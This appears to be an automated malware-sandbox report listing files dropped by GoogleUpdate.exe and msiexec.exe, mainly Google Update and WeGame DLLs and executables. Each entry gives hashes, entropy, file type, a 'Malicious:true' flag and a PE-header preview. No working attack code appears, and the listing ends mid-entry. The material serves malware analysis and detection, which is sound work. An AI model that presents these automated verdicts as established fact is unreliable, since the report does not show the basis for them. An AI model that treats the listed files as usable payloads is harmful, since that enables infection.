                                      SHA-512:009A1397BB13B0B4A2C540EEF4927C80754AD27A88E54A998732604A902C97594FAC3E46303224B90F5329168D3AA468610BE46B64F25833FA5E68A60F2BAA7A
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ ......................................,.....@.............................I....0..(....@...u.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....u...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sw.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45856
                                      Entropy (8bit):4.641351954013158
                                      Encrypted:false
                                      SSDEEP:384:eCwSgicgiN7upv4MZ7NIYi6yeI5nfAM+o/8E9VF0NyuY:ePSQx72v4MZ7aYi6yHnfAMxkEN
                                      MD5:E17047F1905DD4A7C54F6B7391A3A2B5
                                      SHA1:460E93C96B4605EA4EBB8CC3B5C98880B238B38E
                                      SHA-256:21D08E9FBC8D311096E48D0121B6E139308F008E588E9FBB2C044AD54D0C6FE3
                                      SHA-512:3A060C089A5A200EC38A275F44ECB02C56764EFA0860E4F2CE4362820265C9EF2A8E5B5FD94AAD6CE7E9FB619CC4AFD1BB477FBFB3EACFD5DC961D0A38FC552F
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ............................................@.............................I....0..(....@...z.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....z...@...|..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ta.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):46368
                                      Entropy (8bit):4.899032374348262
                                      Encrypted:false
                                      SSDEEP:384:wBrw8Y51ZLmE4r2pjIYi6yo/lAM+o/8E9VF0Nyb:krvY51ZLmE4r2pMYi6yMAMxkE
                                      MD5:2C0F7D4EE79FAE77026D5733989B43C7
                                      SHA1:FE9395690CD573794D40F04E16B828138BAFF120
                                      SHA-256:B61196B93E653DC3B6AB3CFB367218081A88A2DC21F678DEB79AD47DCAA2D573
                                      SHA-512:32DFCBAA68F8CD387DD7A05D056368382911D7EC80B22475D182912CD27FF3888A0865916B9D76D76777A24F16FACF54EE342D1A7F4AB3B87624DDA1E72A367A
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ......................................;.....@.............................I....0..(....@...|.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....|...@...~..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_te.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45856
                                      Entropy (8bit):4.851599264948585
                                      Encrypted:false
                                      SSDEEP:384:kUgaco45Z49fN1XnWuIYi6y/g/HAM+o/8E9VF0NyhQM:MacV5yFXXnWjYi6ymAMxkEv
                                      MD5:456E12D968E0E77270173EF937915C3C
                                      SHA1:0DAF03D2C505467FDEC7B5BDFBE3699554892164
                                      SHA-256:C5C9AC04B400B67C6CFDF2EE9C21901DF239A00CABD402E59AF0A00D4EFB0173
                                      SHA-512:AA3A63145EE88D266E8B57202D01E934AA79B14C6CFF6DC1381B1C526A3F890EF6EA2917DA7AF1ACDD04785341B025FEA3709E636C9D36745E644CC2ABF5A1E7
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ .......................................,....@.............................I....0..(....@..8z.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...8z...@...|..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_th.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43296
                                      Entropy (8bit):4.846117586396544
                                      Encrypted:false
                                      SSDEEP:384:5FNrnrrGsMKt8hetnOfIYi6y7HoEAM+o/8E9VF0NyDR:lnrrGszt8hetnOgYi6ybAMxkE
                                      MD5:21E645B6564A4BFF088ABCDB94F7B4BA
                                      SHA1:DB9966EA497A9C5532172F8CB70D037FE2DAA13C
                                      SHA-256:08E643F88D1DF3F681824923EEA75F7DDDEE55D6AB62DCEB5A812C05CE8C753D
                                      SHA-512:81D7B60B211230C9AF1CF4B016E80092E3E765CB40E775992C850495CE8E4F9886F190A507650F26F092A468533FEC03B01AC3837D94282E75380602B9DB5E78
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........z......h........ .......................................8....@.............................I....0..(....@...p.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....p...@...r..................@..@.reloc.. ............~..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_tr.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.654307955240313
                                      Encrypted:false
                                      SSDEEP:768:8mp9FRqnk6qXQEdmvgNPTEw+G9Ahrxe+BzQSXGPYi6yF7AMxkEAU:8mtA6hdmvATEwSxrQKW7lxf
                                      MD5:E05348222EBC21D3D1B4AED180A62566
                                      SHA1:851394AE7D9C9FB85979B7D0F660A415004DEF0A
                                      SHA-256:531415CBE8C0753227934E926446872416E1593BD653826AA29BEA9E6F5AC668
                                      SHA-512:055A1AE42F5CD9229884EFBEA235085326B1B8904C4C28C5096430BC528A19AC29D450740A76D5C2BFD69D67A7E78958343FBAAB575B80AC495B3E373EF26502
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ .......................................>....@.............................I....0..(....@...u.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....u...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_uk.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.81325112433323
                                      Encrypted:false
                                      SSDEEP:384:MVrwKgHxyC2secvVJE/GfuyQIYi6ynB9B6eAM+o/8E9VF0Nye/R8:QrwVuy5Yi6yXEeAMxkEei
                                      MD5:AF3F42CBB576430DDD211C4A1FA1D5A9
                                      SHA1:69149B4A0EE61C2250BD1A758FA7AA7C281A6178
                                      SHA-256:4D72AAD9545AB5EB6A89E3690675ABF9007CAA376D9DA6B0C8CB5C704BA9407D
                                      SHA-512:903007FF6E99201D38CF4B9ECC54DF9F1DE67DC58CBCC6277CEDE1BE2FE8EBB508D6A37DD4FD98D64E9A2616625544AE1302DAF335C2454C4A56C7CB4D18DD1A
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ ......................................~.....@.............................I....0..(....@...t.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....t...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ur.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.800433810371665
                                      Encrypted:false
                                      SSDEEP:384:TVEq9zmAco2u9keeZyYGm9IYi6yud4LlAM+o/8E9VF0NyhGa:ZEq9zmAco2AkeesYNqYi6yqclAMxkEWa
                                      MD5:3C9DA7F71844BEB6DD85F8D77172B908
                                      SHA1:D54CA9CD4187DD7C165F549E34ED577F6B4B8315
                                      SHA-256:5C95D80D684E8A886DFBBCFB54F2EF4AD6C26FF0E17C6CCFEC2D8373BBC32A18
                                      SHA-512:CCD2B2EB17A25C95E8596600CDC629EE26780D014788DB8A526DF058832AFF7EBB2BB3273E5C0C9642D5949E78AE5A9F89640AA3C8807FA106338B459C9EBCD1
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ .......................................z....@.............................I....0..(....@..0t.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...0t...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_vi.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43808
                                      Entropy (8bit):4.715476850485692
                                      Encrypted:false
                                      SSDEEP:384:xw9MXlJncBzIYi6ydFsLAM+o/8E9VF0NyHfAvOv:29MX3cB8Yi6yfuAMxkECi
                                      MD5:154B7A3DC9AE005E0D502E2D02B3473D
                                      SHA1:03EE0B94992A6EDCE78ABACE71C9F4EFEAFB7C97
                                      SHA-256:A9D43AE666670ECD93A16E131F402EC40067E44657A0BBC5136B152AD4706804
                                      SHA-512:823246ACB4205A60610B5FC09F54F758A70BC1596E118E323A1FA5092621094145CD5EA75A22CDDB944BDD7CD3A93D87B88EA887B1455EBF028EB6B9D0C1FC13
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........|......h........ ............................................@.............................I....0..(....@..0s.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...0s...@...t..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-CN.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):38176
                                      Entropy (8bit):4.778670861598811
                                      Encrypted:false
                                      SSDEEP:384:C1s5s9AoB2HIYi6y6KOpAM+o/8E9VF0NyB:i7AoB2oYi6yQAMxkE
                                      MD5:3238536195C72141BF60EE15CE6413DD
                                      SHA1:5D89916A8F72B9836E3E2E1EB93077B515A231E9
                                      SHA-256:5C0E33D4CBDA0D878A48C51A7286E6CE3884EF0AA06CE4FC306B888D3E8F07F4
                                      SHA-512:78FCC97DB95B720E1CE7FA24EC9820D784A8013F791837629021176F8AE416775ED8A25B3AFBCE33FC18B29DE5375F3EA2818A5A345BA0AD87BC71DFB72CBE0C
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........f......h........ ............................................@.............................L....0..(....@...\...........l.. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....\...@...^..................@..@.reloc.. ............j..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-TW.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):38176
                                      Entropy (8bit):4.793797453530872
                                      Encrypted:false
                                      SSDEEP:384:Z8dw29Gx/PhIYi6y8mAM+o/8E9VF0Nyy2ay:adwx/P2Yi6y5AMxkEJj
                                      MD5:64674D06CA9F8888A62B75DF12950CC2
                                      SHA1:4518365CE4270295271F6DFDE6ED452E0F67B855
                                      SHA-256:2B6AE6A1B6F89EE717ACB32EF44D229D7CF4CA24DC383D4A078F004B3434662B
                                      SHA-512:0824ECF6DA9F1A822AB646E47454442B13365F2A45792DCE5E68269D9D31CA32315CFCA11447FFAE1F17293231896DB36BFD35FDE6A644E674AD247F0AED9887
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........f......h........ ......................................B.....@.............................L....0..(....@..0]...........l.. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...0]...@...^..................@..@.reloc.. ............j..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\psmachine.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):278816
                                      Entropy (8bit):6.535975870555865
                                      Encrypted:false
                                      SSDEEP:6144:jRyuVhSBeXTIxjqJ64G6peRXpmAOcou9jtwQrHQc/mw3Ia:j8qhSBeX2jqJ6FvXpmmou9pwtovIa
                                      MD5:CDE140B706BB57F83D1AFE5C5B8EC346
                                      SHA1:44A286784BB6C8D8D66FF25FF8A502D06DB9BADA
                                      SHA-256:5A0C4B1BF6A52B2380803B3E2494DD37A221B68E5302B5AB7FF9C27D85398649
                                      SHA-512:414B7C24FEB8690B34EF80D53C03474BA7979EE7CD4D2F78AB9B26CD3B9669F20326E35AFD57C9954DC0BD2A8E25309FD1D00B7E0E3925C0E9F2351A1E0E414A
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........xV........................g...r.......r.......r...........................h..........................................Rich............................PE..L...)..e...........!.....*...................P...............................p......J%....@..........................r.......r...........h.............. )...@...-...b..T............................b..@............P..h............................text....'.......(.................. ..`.orpc...c....@.......,.............. ..`.rdata...6...P...6..................@..@.data...85...........d..............@....rsrc....h.......j..................@..@.reloc...-...@......................@..B........................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\psmachine_64.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):355616
                                      Entropy (8bit):6.162519927894666
                                      Encrypted:false
                                      SSDEEP:6144:UuUZ+wSATioVOG31+aOEyxTM+d9+ohtbAcqARwytQc/mw:UbBSATioVR31+2ynD+oYcfwHo
                                      MD5:B002F5315B6EB8801A91756643A15C1B
                                      SHA1:BD14CB9D3808873888921DC893CA1CF48546676C
                                      SHA-256:0A9C8F037925570FFE1D36E19E194B7D67346306C93296745AE4FE7002F02D3E
                                      SHA-512:63F6F83F5BE656BD6F17CDF31AB4D8158E55E50BB3D72B4DF2FE08B132F166CE446B5C25A8A1860CE72DF1568AF71EE32B898A861FF99EDF09A5666A813C962A
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?_.g{>.4{>.4{>.4.L.5.>.4.L.5w>.4.T.5[>.4.T.5r>.4.T.5G>.4.L.5l>.4.L.5f>.4{>.4.?.4.U.5H>.4.U.5z>.4.U 4z>.4{>H4z>.4.U.5z>.4Rich{>.4........................PE..d...+..e.........." .................9..............................................&.....`......................................... ^.......^.......P...h.......$...D.. )......$....8..T............................9...............................................text............................... ..`.orpc...$........................... ..`.rdata..V...........................@..@.data...|P.......*...X..............@....pdata...$.......&..................@..@_RDATA..............................@..@.gxfg...0.... ......................@..@.gehcont.....@......................@..@.rsrc....h...P...j..................@..@.reloc..$............,..............@..B........................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\psuser.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):278816
                                      Entropy (8bit):6.535584786524981
                                      Encrypted:false
                                      SSDEEP:6144:sRyuVhSBeXTIxjqJ64G6peRXpmAOPfu0RtwQrHQc/mw3Ia:s8qhSBeX2jqJ6FvXpmVfu0bwtovIa
                                      MD5:D7770594FA82330B50573FDD8A2CCF3D
                                      SHA1:5A64FA8671AB64A2E974637917B987D001B4EDAF
                                      SHA-256:350339ACF9B3CA3055823C67AB568390D54C35DA4692E33C3A7E62FBC7C4B9A9
                                      SHA-512:CC2D672F15C5674B2DE8024E204D533EF9347DD635633074BF8C38A96209355B5A10D14706677060B01D5E329FC465259E8996587A0A2EA7F2FF7C7B5DBDD64A
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........xV........................g...r.......r.......r...........................h..........................................Rich............................PE..L...;..e...........!.....*...................P...............................p......4.....@..........................r.......r...........h.............. )...@...-...b..T............................b..@............P..h............................text....'.......(.................. ..`.orpc...c....@.......,.............. ..`.rdata...6...P...6..................@..@.data...85...........d..............@....rsrc....h.......j..................@..@.reloc...-...@......................@..B........................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\1.3.36.372\psuser_64.dll

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):355616
                                      Entropy (8bit):6.161744248585241
                                      Encrypted:false
                                      SSDEEP:6144:5uU5uwSATioVOG31+aOEyxTM+d9eoh0bLc+ORwynlQc/mwu:5bRSATioVR31+2ynDeoScRwi+om
                                      MD5:458F24A910A1022B5DB6219E7A838CE5
                                      SHA1:DCA5EEF5567B54F8FD4BA11E40D766E4C1BB30B3
                                      SHA-256:E0D786B4823F4D4137A2110A2E867237ABC5BC29604A55D6A172199E56CE3BE7
                                      SHA-512:4D373720EB6BB4B901E250CF4DB778BE10F4FF4A260D62112DBF5E28F139C1C1C26B5B7268B7B3167E83E74BDF3BF6CC44C518127AFE1B26EFD5E874D2865B99
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?_.g{>.4{>.4{>.4.L.5.>.4.L.5w>.4.T.5[>.4.T.5r>.4.T.5G>.4.L.5l>.4.L.5f>.4{>.4.?.4.U.5H>.4.U.5z>.4.U 4z>.4{>H4z>.4.U.5z>.4Rich{>.4........................PE..d...K..e.........." .................9....................................................`..........................................^.......^.......P...h.......$...D.. )......$....8..T............................9...............................................text............................... ..`.orpc...$........................... ..`.rdata..F...........................@..@.data...|P.......*...X..............@....pdata...$.......&..................@..@_RDATA..............................@..@.gxfg...0.... ......................@..@.gehcont.....@......................@..@.rsrc....h...P...j..................@..@.reloc..$............,..............@..B........................................................

                                      C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

                                      Download File
                                      Process:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):162080
                                      Entropy (8bit):5.986584434229805
                                      Encrypted:false
                                      SSDEEP:3072:DwzvOYTt5YP/aKavT/DvbEvK9aobNI2B+flkL7OjUuxGftPyhdY55s2ZUuyNFhyV:GtiP/aK2h9H/B+/
                                      MD5:BAF0B64AF9FCEAB44942506F3AF21C87
                                      SHA1:E78FB7C2DB9C1B1F9949F4FCD4B23596C1372E05
                                      SHA-256:581EDECA339BB8C5EBC1D0193AD77F5CAFA329C5A9ADF8F5299B1AFABED6623B
                                      SHA-512:EE590E4D5CCDD1AB6131E19806FFD0C12731DD12CF7BFB562DD8F5896D84A88EB7901C6196C85A0B7D60AEE28F8CFBBA62F8438D501EABD1BB01EC0B4F8D8004
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L......e.................D..........Ru.......`....@.......................................@.................................P...x....... ............P.. )..........p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...............@..............@..B........................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\WeGame\Lua51.dll

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):560008
                                      Entropy (8bit):5.909191877084503
                                      Encrypted:false
                                      SSDEEP:6144:xMbrcPhnaq5rl9C2p3lgpwVjrjowwZGg81UFotKrwIzSCiMmkEelsXtWWkwEEp4w:rT5rTvDMwb6KZZsEFtawEEp1ui7v
                                      MD5:0527DF9BDAAEA7250291EFCB5B33B709
                                      SHA1:1B6B3511C30AA66A0A0258578A4B695DB2FBDE36
                                      SHA-256:7FA367A644670ED94A01BC0927996D93B82EA2658BB7D84C99C648F12B6A61F1
                                      SHA-512:D8F49F954112E744B161246759AA0A6B106125A9B936E98C3F57C4535B1E7866ADFFE3E1699412EF8D549A84121F9492F67BB504B91FFFD384BBC2E89611631B
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(.0.l.^\l.^\l.^\e..\~.^\>._]n.^\x._]o.^\l._\..^\>.[]g.^\>.Z]f.^\>.]]e.^\l.^\m.^\.Z]Q.^\.^]m.^\.\]m.^\Richl.^\................PE..L...+.Bc...........!................i................................................9....@.........................@...."...D.......................X...3...p..........8...........................(...@............@...............................text...@........................... ..`.rdata..^...........................@..@.data........0......................@....idata.......@....... ..............@..@.00cfg.......`.......4..............@..@.reloc...!...p..."...6..............@..B................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\WeGame\WeGame.exe

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1427336
                                      Entropy (8bit):6.155905635785417
                                      Encrypted:false
                                      SSDEEP:24576:LRCJ0FRnE2wKTK/t9sWQTxybUJu0PQGGL0xkFeyD6JB:NEkE2xK/t9RQTZJ2GGAcPDu
                                      MD5:063AF51C19F29BCDFD26C1BEBDC9ACE6
                                      SHA1:810817459E322BA44815DF62702B9C8FE04B26FB
                                      SHA-256:C6EF12669E1D0A3D0F54AD7CD516D5CF2DDF81EDC350C3AAFAA51C8EA9226A73
                                      SHA-512:5FFFF7F49B68004EB8F02522724B45D9C6CFA5CB45FF1C5F3CD93F1C65F0CADC322CC09A777B933C64650A7666C6204B67F9B1ADF266BA2D1CE537C17F4A99A9
                                      Malicious:true
                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......>0..zQ..zQ..zQ...9..xQ..(9..wQ..(9..pQ..(9..^Q..(9..~Q..s)^.\Q...8..OQ...8..xQ...8...Q..zQ..&S...8...Q...82.{Q..zQZ.{Q...8..{Q..RichzQ..........................PE..L...Y[wd..........#......D...L..............`....@........................................`................................=.......0..(................3..........pG..T...................hH.......G..@............`...............................text....C.......D.................. ..`.rdata..~L...`...N...H..............@..@.data....{.......4..................@....rsrc...(....0......................@..@................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\WeGame\adapt_for_imports.dll

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):414600
                                      Entropy (8bit):6.498913790154161
                                      Encrypted:false
                                      SSDEEP:6144:A185Y9Pd04VB/XrghF6fraV5A8B2NNy7gTC+kTXcEXS+aM22PQ+d83qUspBOXUUi:y/GFnZH9woGojR39mbEGM8M
                                      MD5:D9F36FF27DC0D08FD384A99BB801A24A
                                      SHA1:886287B85E2B57E05E61EE582DD1595F7E620765
                                      SHA-256:96AEA19B11327AE4200396E84F06A4746A926F43B688C22E60B370DED1CF6D58
                                      SHA-512:032F0F0E6200383DD9A4A7628E1EF5B67EA6FCFD3A872CD2FA0B952CCC3286B10550526C01E0294068E7D3995714EFDF798607A51CF4681B8295B8D8493963DD
                                      Malicious:true
                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........VFA.8.A.8.A.8.+.=.E.8.+.<...8.....D.8...<.J.8...;.J.8...=.X.8...9.E.8.H..B.8.H..i.8...9.B.8.A.9.?.8...=.J.8...8.@.8.....@.8...:.@.8.RichA.8.................PE..L....Zwd...........!.................w..............................................D.....@.`............................'..H........................ ...3.......L..`f..T...................Xg.......f..@............................................text............................... ..`.rdata...q.......r..................@..@.data....M...@....... ..............@....rsrc...............................@..@.reloc...L.......N..................@..B........................................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\WeGame\beacon_sdk.dll

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1537416
                                      Entropy (8bit):6.78098762929255
                                      Encrypted:false
                                      SSDEEP:24576:+PonniDaQDrTwkQLAxDQKbt3R0ydNywVvpg8yq4lVfuzGUHttBXf+ib7STJMaUmA:gonniDasrTk+tB5xxg8ASzzjcibmTJTE
                                      MD5:C83DD90D61BAE5CF1D4B0620649726D6
                                      SHA1:CDB21AF237425523D230A1738C4111776B3E8318
                                      SHA-256:B5DF19432F50AD434CA860173C9EB0DC6FDFACA48F75A3B416D038C213D089DA
                                      SHA-512:480CB660931EECE9FEE17FCB60B5C467CEB033D7D2F9FC0CF37B82DBC7443918935BA5A24AAEB8A284C95820ECCAB382E67342E6F0038C4D36B36F51D04DC412
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........o.S...S...S.......Y.......^.......K.......W...S...]...S...7...Z..x...............X.......O.......R.......R.......R...RichS...........PE..L....(_c...........!.................k..............................................V.....@......................... =..|....G.......................B...3.......... ...T...........................x...@...............X............................text.............................. ..`.rdata.............................@..@.data....\...p...6...V..............@....QMGuid.............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\WeGame\common.dll

                                      Download File
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3880328
                                      Entropy (8bit):6.770205397989409
                                      Encrypted:false
                                      SSDEEP:98304:ZnL1LHHgG/M90itlALhFlHovpaz82uukT:Z5gG/M9I5UaY7
                                      MD5:856D1285704805940B8379E81B18F3EB
                                      SHA1:AAE6852E7F86A8163CA5A63178A7CCEB1C50FF67
                                      SHA-256:2E21F70ADCBE5FE3D51EB9236FC23E071E675C802BFEEC2CA5C0A41EEF35E9A2
                                      SHA-512:50B61C980C176F2F32BD4E353187D5DB9F3D3D7D01486105DA95D7E7BF153386D2808DC94909B4998E05ACCEBE6CC388ECAD8246D236A89529F9A1274B34885C
                                      Malicious:true
